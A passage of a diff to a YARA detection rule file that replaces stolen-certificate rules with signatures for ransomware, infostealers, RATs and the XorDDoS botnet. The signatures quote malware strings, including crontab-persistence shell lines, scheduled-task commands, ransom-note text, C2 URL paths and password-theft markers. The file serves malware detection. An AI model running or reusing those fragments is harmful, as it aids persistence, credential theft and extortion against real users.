+		$s7 = /ScreenCaptureThread\s(finished|terminated)!/ wide
+		$s8 = /ScreenCapture_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "14:2a:ac:42:17:e2:2b:52:5c:85:87:58:97:73:ba:9b" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 6 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4026D6291F1Ac7Cf86C2C81172Cfb200 : FILE
+rule DITEKSHEN_MALWARE_Win_Cratpluginransomhansom : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CRAT Hansom Ransomware plugin DLL"
 		author = "ditekSHen"
-		id = "ea11705d-37a1-5050-b01a-b7fc523c675a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "0bfc97df-545f-5453-afe0-5777dc1c95b4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5218-L5229"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2002-L2020"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c821f288bb6555e3955dfccf02edde2448f0499942eea24c488a6426985bff74"
+		logic_hash = "b22f6d22630f311241634513eb051df2b36af84a938c1ae1f5284e5a5d7d3077"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "2ae4328db08bac015d8965e325b0263c0809d93e"
-		importance = 20
+
+	strings:
+		$cmd1 = "/f /im \"%s\"" wide
+		$cmd2 = "add HKLM\\%s /v %s /t REG_DWORD /d %d /F" wide
+		$cmd3 = "add HKCU\\%s /v %s /t REG_DWORD /d %d /F" wide
+		$cmd4 = "\"%s\" a -y -ep -k -r -s -ibck -df -m0 -hp%s -ri1:%d \"%s\" \"%s\"" wide
+		$s1 = "\\hansom.jpg" wide
+		$s2 = "HansomMain" fullword ascii wide
+		$s3 = "ExtractHansom" fullword ascii wide
+		$s4 = "Hansom2008" fullword ascii
+		$s5 = ".hansomkey" fullword wide
+		$s6 = ".hansom" fullword wide
+		$s7 = /Ransom_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MztxUCVYqnxgsyqVryViRnMfHFYBgyVMXkXuVGqmyPx" and pe.signatures [ i ] . serial == "40:26:d6:29:1f:1a:c7:cf:86:c2:c8:11:72:cf:b2:00" )
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $cmd* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $cmd* ) ) or 6 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B0A308Fc2E71Ac4Ac40677B9C27Ccbad : FILE
+rule DITEKSHEN_MALWARE_Win_Aliencrypter : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects AlienCrypter injector/downloader/obfuscator"
 		author = "ditekSHen"
-		id = "207aa920-528c-5fa2-a8d4-4a44da4c870e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "af9e785a-bdec-5d3e-9a50-56f7f1a0507e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5231-L5242"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2022-L2036"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a71c47475327fb6268db34cd9d47451090fa3e673accfa905d32ebfb35f11e40"
+		logic_hash = "28a2a6e6d58fd6efbb5753a7be5b621a3eac546d45f9481b9dd2641cbe70b547"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "15e502f1482a280f7285168bb5e227ffde4e41a6"
-		importance = 20
+
+	strings:
+		$s1 = ".AlienRunPE." ascii wide
+		$s2 = "RunAsNewUser_RunDLL" fullword wide
+		$s3 = { 00 50 52 4f 43 45 53 53 5f 53 55 53 50 45 4e 44 5f 52 45 53 55 4d 45 00 64 6e 6c 69 62 2e 50 45 00 }
+		$s4 = { 2e 41 6c 69 65 6e 52 75 6e 50 45 00 50 52 4f 43 45 53 53 5f 54 45 52 4d 49 4e 41 54 45 00 }
+		$s5 = "@@@http" wide
+		$resp1 = "</p><p>@@@77,90," ascii wide
+		$resp2 = "</p><p>@@@HH,JA," ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Volpayk LLC" and pe.signatures [ i ] . serial == "00:b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" )
+		( uint16( 0 ) == 0x5a4d and 3 of them ) or ( 1 of ( $resp* ) and 2 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_009Ecaa6E28E7615Ef5A12D87E327264C0 : FILE
+rule DITEKSHEN_MALWARE_Win_Ficker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Ficker infostealer"
 		author = "ditekSHen"
-		id = "8fd9f4e8-4ec3-5731-8032-e2657ee229ca"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "1cfeea86-e8bf-50fb-ba08-435d7a14a913"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5244-L5255"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2038-L2055"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "24858027f62fd057c06dbf58b4a6e1e5f1dcd9429676232a8e66d231e713f56a"
+		logic_hash = "adcc0ffc0e1ded36dc41c22d10d2ea293d5740484203892bcecf89a5f4001452"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "50899ef5014af31cd54cb9a7c88659a6890b6954"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Ficker"
+
+	strings:
+		$s1 = "JNOde\\" ascii
+		$s2 = "\"SomeNone" fullword ascii
+		$s3 = "kindmessage" fullword ascii
+		$s4 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writting non-UTF-8 byte sequences" ascii
+		$s5 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writing non-UTF-8 byte sequences" ascii
+		$s6 = "(os error other os erroroperation interrruptedwrite zerotimed" ascii
+		$s7 = "(os error other os erroroperation interruptedwrite zerotimed" ascii
+		$s8 = "nPipeAlreadyExistsWouldBlockInvalidInputInvalidDataTimedOutWriteZeroInterruptedOtherN" fullword ascii
+		$s9 = "_matherr(): %s in %s(%g, %g)  (retval=%g)" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HaqMkgGQmnNHpFsQmzMRDcavkPBzOcvMatDmcLHuDNoiQWMqj" and pe.signatures [ i ] . serial == "00:9e:ca:a6:e2:8e:76:15:ef:5a:12:d8:7e:32:72:64:c0" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_19985190B09206952Efd412D3Ccc18E2 : FILE
+rule DITEKSHEN_MALWARE_Win_Xorist : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Xorist ransomware"
 		author = "ditekSHen"
-		id = "bd94cfd0-adaa-5e37-880e-8ef50328499d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "76119441-343d-51c3-90eb-9d54c80a983d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5257-L5268"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2057-L2078"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6db1aaabd9a257e863a5ff771a736b705391602f7f5e2b799f8c47d3ae566f0f"
+		logic_hash = "b34e3fa065cabcd8d26908866e53ff599631128e1da884e42a2e63d890879eaa"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "49ec0580239c07da4ffba56dc8617a8c94119c69"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.Xorist"
+
+	strings:
+		$x1 = { 00 4d 00 41 00 47 00 45 00 0b 00 50 00 55 00
+                53 00 53 00 59 00 4c 00 49 00 43 00 4b 00 45
+                00 52 00 }
+		$x2 = { 30 70 33 6e 53 4f 75 72 63 33 20 58 30 72 31 35
+                37 2c 20 6d 6f 74 68 65 72 66 75 63 6b 65 72 21
+                00 70 75 73 73 79 6c 69 63 6b 65 72 00 2e 62 6d
+                70 00 2e 00 2e 2e 00 6f 70 65 6e 00 2e 65 78 65 }
+		$s1 = "\\shell\\open\\command" fullword ascii
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii
+		$s3 = "CRYPTED!" fullword ascii
+		$s4 = "Attention!" fullword ascii
+		$s5 = "Password:" fullword ascii
+		$s6 = { 43 6f 6d 53 70 65 63 00 2f 63 20 64 65 6c 20 22 00 22 20 3e 3e 20 4e 55 4c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "cwcpbvBhYEPeJYcCNDldHTnGK" and pe.signatures [ i ] . serial == "19:98:51:90:b0:92:06:95:2e:fd:41:2d:3c:cc:18:e2" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 5 of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_03B27D7F4Ee21A462A064A17Eef70D6C : FILE
+rule DITEKSHEN_MALWARE_Win_PYSA : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PYSA/Mespinoza ransomware"
 		author = "ditekSHen"
-		id = "96920ba8-b6d6-5cf4-9a3c-cb6f5c9b3048"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3a3fad6a-46bc-51dc-9723-4412034ca442"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5270-L5281"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2080-L2100"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "53a4c4474b1add510624e23eac642e8cba145248d72a2ffc37d0aca141a041c2"
+		logic_hash = "e614b827bd8d065e94852fed01497c785bf90c52c3624aff9939b3f40ecf96a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a278b5c8a9798ee3b3299ec92a4ab618016628ee"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.PYSA"
+
+	strings:
+		$s1 = "%s\\Readme.README" fullword wide
+		$s2 = "Every byte on any types of your devices was encrypted" ascii
+		$s3 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 74 65 78 74 00 (50|70) (59|79) (53|73) (41|61) }
+		$s4 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 63 61 70 74 69 6f 6e 00 00 (50|70) (59|79) (53|73) (41|61) }
+		$s5 = { 2e 62 61 74 00 00 6f 70 65 6e 00 00 00 00 53
+                4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f
+                66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72
+                65 6e 74 56 65 72 73 69 6f 6e 5c 50 6f 6c 69
+                63 69 65 73 5c 53 79 73 74 65 6d 00 00 00 }
+		$f1 = ".?AVPK_EncryptorFilter@CryptoPP@@" ascii
+		$f2 = ".?AV?$TF_EncryptorImpl@" ascii
+		$f3 = "@VTF_EncryptorBase@CryptoPP@@" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CCL TRADING LIMITED" and pe.signatures [ i ] . serial == "03:b2:7d:7f:4e:e2:1a:46:2a:06:4a:17:ee:f7:0d:6c" )
+		uint16( 0 ) == 0x5a4d and all of ( $f* ) and 3 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_66F98881Fbb02D0352Bef7C13Bd61Df2 : FILE
+rule DITEKSHEN_MALWARE_Win_Polar : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Polar ransomware"
 		author = "ditekSHen"
-		id = "9cc569f4-1686-5f17-99a4-90750023d519"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ab4e4478-5417-5918-b5df-5b6ffe7438a9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5283-L5294"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2102-L2123"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "f265524fb9a4a58274dbd32b2ed0c3f816c5eff05e1007a2e7bba286b8ffa72c"
-		logic_hash = "3d70da3f644a90bc6e7b405a41225a328d7007187525a0b277f0fc1136be8b5b"
+		logic_hash = "4f05a8ace9a03d02f54f0ebdd5349d1d1b23db8e34aa71edd44eebf02b88745c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "722eee34153fc67ea7abdcb0c6e9e54479f1580e"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.Polar"
+
+	strings:
+		$s1 = "Encrypt Failed ! ErrorMessage :" wide
+		$s2 = ".locked" fullword wide
+		$s3 = ".cryptd" fullword wide
+		$s4 = "$SysReset" fullword wide
+		$s5 = "Polar.Properties.Resources" ascii wide
+		$s6 = "AES_EnDecryptor.Basement" fullword ascii
+		$s7 = "RunCMDCommand" fullword ascii
+		$s8 = "killerps_list" fullword ascii
+		$s9 = "clearlog" fullword ascii
+		$s10 = "encryptFile" fullword ascii
+		$s11 = "changeBackPictrue" fullword ascii
+		$pdb1 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x86\\Release\\Encode.pdb" ascii
+		$pdb2 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x64\\Release\\Encode.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "66:f9:88:81:fb:b0:2d:03:52:be:f7:c1:3b:d6:1d:f2" )
+		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 1 of ( $pdb* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3F8B1D4C656982A34435F971C9F3C301 : FILE
+rule DITEKSHEN_MALWARE_Win_Bitrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BitRAT RAT"
 		author = "ditekSHen"
-		id = "7bafe9c8-7ec5-5847-81dc-2f2d0753f784"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "9041a21f-0f27-5e90-8429-863e361381bf"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5296-L5307"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2125-L2153"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "95fd60c5f236b06fca308696dfe3e3aeb3aa6f255c6030d44822dc33a7c4c917"
+		logic_hash = "128c3c8cea0439f272de241c77fc9ed46e64419e497091e444e98123dad059cb"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "f12a12ac95e5c4fa9948dd743cc0e81e46c5222e"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.BitRAT"
+
+	strings:
+		$s1 = "\\plg\\" fullword ascii
+		$s2 = "klgoff_del" fullword ascii
+		$s3 = "files_delete" ascii
+		$s4 = "files_zip_start" fullword ascii
+		$s5 = "files_exec" fullword ascii
+		$s6 = "drives_get" fullword ascii
+		$s7 = "srv_list" fullword ascii
+		$s8 = "con_list" fullword ascii
+		$s9 = "ddos_stop" fullword ascii
+		$s10 = "socks5_srv_start" fullword ascii
+		$s11 = "/getUpdates?offset=" fullword ascii
+		$s12 = "Action: /dlex" fullword ascii
+		$s13 = "Action: /clsbrw" fullword ascii
+		$s14 = "Action: /usb" fullword ascii
+		$s15 = "/klg" fullword ascii
+		$s16 = "klg|" fullword ascii
+		$s17 = "Slowloris" fullword ascii
+		$s18 = "Bot ID:" ascii
+		$t1 = "<sz>N/A</sz>" fullword ascii
+		$t2 = "<silent>N/A</silent>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Word" and pe.signatures [ i ] . serial == "3f:8b:1d:4c:65:69:82:a3:44:35:f9:71:c9:f3:c3:01" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 4 of ( $s* ) and 1 of ( $t* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ef9D0Cf071D463Cd63D13083046A7B8D : FILE
+rule DITEKSHEN_MALWARE_Win_Poullight : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Poullight infostealer"
 		author = "ditekSHen"
-		id = "f4b83bdf-ce07-5bad-b3e2-2c192d67f9f1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c80143f8-9c44-5e96-b1ff-2adb4bf031e4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5309-L5320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2155-L2176"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9cf4ee1b3000d96d419bfd3e9ac3fb07f843aed735582c72e3a9799e2a56e364"
+		logic_hash = "e60ffb10892d35664a088d69c965e130f87bb1a59c257d484bdfe5085074bccd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "346849dfdeb9bb1a97d98c62d70c578dacbcf30c"
-		importance = 20
+		snort2_sid = "920074-920075"
+		snort3_sid = "920074-920075"
+		clamav_sig = "MALWARE.Win.Trojan.Poullight"
+
+	strings:
+		$s1 = "zipx" fullword wide
+		$s2 = "{0}Windows Defender.exe" fullword wide
+		$s3 = "pll_test" fullword wide
+		$s4 = "loginusers.vdf" wide
+		$s5 = "Stealer by Nixscare" wide
+		$s6 = "path_lad" fullword ascii
+		$s7 = "<CheckVM>" ascii
+		$s8 = "Poullight.Properties" ascii
+		$s9 = "</ulfile>" fullword wide
+		$s10 = "{0}processlist.txt" fullword wide
+		$s11 = "{0}Browsers\\Passwords.txt" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rubin LLC" and pe.signatures [ i ] . serial == "00:ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E1E7E596F8F5Ccbeed4Ab882B6Cfe6Ce : FILE
+rule DITEKSHEN_MALWARE_Win_Snakekeylogger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Snake Keylogger"
 		author = "ditekSHen"
-		id = "063d70e1-06b0-53f6-8edb-c81c89af0a05"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e44bf33c-916d-5dc3-ba2a-89e13f1511a2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5322-L5333"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2178-L2207"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "56977d47d8fcfd5eb7b5b4a141a9465e1cd2c497f05e61854e0ab09e2c7065a0"
+		logic_hash = "7d787026b290c3c6a43c7de83233f22980733e7401260ff2f763e6f1b534ecba"
 		score = 75
-		quality = 75
+		quality = 42
 		tags = "FILE"
-		thumbprint = "4fec400152db868b07f202fd76366332aedc7b78"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.SnakeKeylogger"
+
+	strings:
+		$id1 = "SNAKE-KEYLOGGER" fullword ascii
+		$id2 = "----------------S--------N--------A--------K--------E----------------" ascii
+		$s1 = "_KPPlogS" fullword ascii
+		$s2 = "_Scrlogtimerrr" fullword ascii
+		$s3 = "_Clpreptimerr" fullword ascii
+		$s4 = "_clprEPs" fullword ascii
+		$s5 = "_kLLTIm" fullword ascii
+		$s6 = "_TPSSends" fullword ascii
+		$s7 = "_ProHfutimer" fullword ascii
+		$s8 = "GrabbedClp" fullword ascii
+		$s9 = "StartKeylogger" fullword ascii
+		$x1 = "$%SMTPDV$" wide
+		$x2 = "$#TheHashHere%&" wide
+		$x3 = "%FTPDV$" wide
+		$x4 = "$%TelegramDv$" wide
+		$x5 = "KeyLoggerEventArgs" ascii
+		$m1 = "| Snake Keylogger" ascii wide
+		$m2 = /(Screenshot|Clipboard|keystroke) Logs ID/ ascii wide
+		$m3 = "SnakePW" ascii wide
+		$m4 = "\\SnakeKeylogger\\" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LnvNzpvYjsjJOwcvwfalIvRAJHVApnpJU" and pe.signatures [ i ] . serial == "00:e1:e7:e5:96:f8:f5:cc:be:ed:4a:b8:82:b6:cf:e6:ce" )
+		( uint16( 0 ) == 0x5a4d and ( all of ( $id* ) or 6 of ( $s* ) or ( 1 of ( $id* ) and 3 of ( $s* ) ) or 4 of ( $x* ) ) ) or ( 2 of ( $m* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_047801D5B55C800B48411Fd8C320Ca5B : FILE
+rule DITEKSHEN_MALWARE_Linux_Xorddos : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects XORDDoS"
 		author = "ditekSHen"
-		id = "750b5b0d-7752-5407-a29e-3272b764a276"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "0ca581c3-bce2-5b4f-8146-9aeb49b88813"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5335-L5346"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2209-L2220"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5e64b59f3d7f7554a482eaa32f5eac80f289bf57865a21381a3c1c78b1dabcab"
+		logic_hash = "192378d903316c1d80b064e78feb6ed9d2ffc9e6c7dc0c8df223d83d17e4e8d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "00c49b8d6fd7d2aa26faad8e5a31f93a15d66d09"
-		importance = 20
+
+	strings:
+		$s1 = "for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done" fullword ascii
+		$s2 = "cp /lib/libudev.so /lib/libudev.so.6" fullword ascii
+		$s3 = "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab" fullword ascii
+		$s4 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LICHFIELD STUDIO GLASS LIMITED" and pe.signatures [ i ] . serial == "04:78:01:d5:b5:5c:80:0b:48:41:1f:d8:c3:20:ca:5b" )
+		uint32( 0 ) == 0x464c457f and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Ceb6B2Eec12934A64F75A4592159F084 : FILE
+rule DITEKSHEN_MALWARE_Win_Blacknet : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlackNET RAT"
 		author = "ditekSHen"
-		id = "a37bf0a2-3205-515c-9957-374108e199e9"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c1ece46a-3cd9-54aa-a105-1c5b19357a7e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5366-L5377"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2222-L2250"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3e4aa8d970ead42bf1abb36a922ef31ac1b1aa308944cf099d6bbfb50e07c588"
+		logic_hash = "64e00325a5a6a595067c6133800e73d943f45e2783475c24ed4a9bd9937fe0d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ccd30b68e37fc177b754250767a16062a711310a"
-		importance = 20
+		snort2_sid = "920079-920082"
+		snort3_sid = "920079-920082"
+		clamav_sig = "MALWARE.Win.Trojan.BlackNET"
+
+	strings:
+		$s1 = "SbieCtrl" fullword wide
+		$s2 = "SpyTheSpy" fullword wide
+		$s3 = "\\BlackNET.dat" fullword wide
+		$s4 = "StartDDOS" fullword wide
+		$s5 = "UDPAttack" fullword wide
+		$s6 = "ARMEAttack" fullword wide
+		$s7 = "TCPAttack" fullword wide
+		$s8 = "HTTPGetAttack" fullword wide
+		$s9 = "RetriveLogs" fullword wide
+		$s10 = "StealPassword" fullword wide
+		$s11 = "/create /f /sc ONSTART /RL HIGHEST /tn \"'" fullword wide
+		$b1 = "DeleteScript|BN|" fullword wide
+		$b2 = "|BN|Online" fullword wide
+		$b3 = "NewLog|BN|" fullword wide
+		$cnc1 = "/getCommand.php?id=" fullword wide
+		$cnc2 = "/upload.php?id=" fullword wide
+		$cnc3 = "connection.php?data=" fullword wide
+		$cnc4 = "/receive.php?command=" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WMade by H5et.com" and pe.signatures [ i ] . serial == "ce:b6:b2:ee:c1:29:34:a6:4f:75:a4:59:21:59:f0:84" )
+		uint16( 0 ) == 0x5a4d and ( 9 of ( $s* ) or all of ( $cnc* ) or all of ( $b* ) or 12 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6B6739E55F3F25B147C4A6767De41F57 : FILE
+rule DITEKSHEN_MALWARE_Win_Stormkitty : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects StormKitty infostealer"
 		author = "ditekSHen"
-		id = "ee84787b-cc90-545d-8e15-bf84676f222c"
-		date = "2024-10-04"
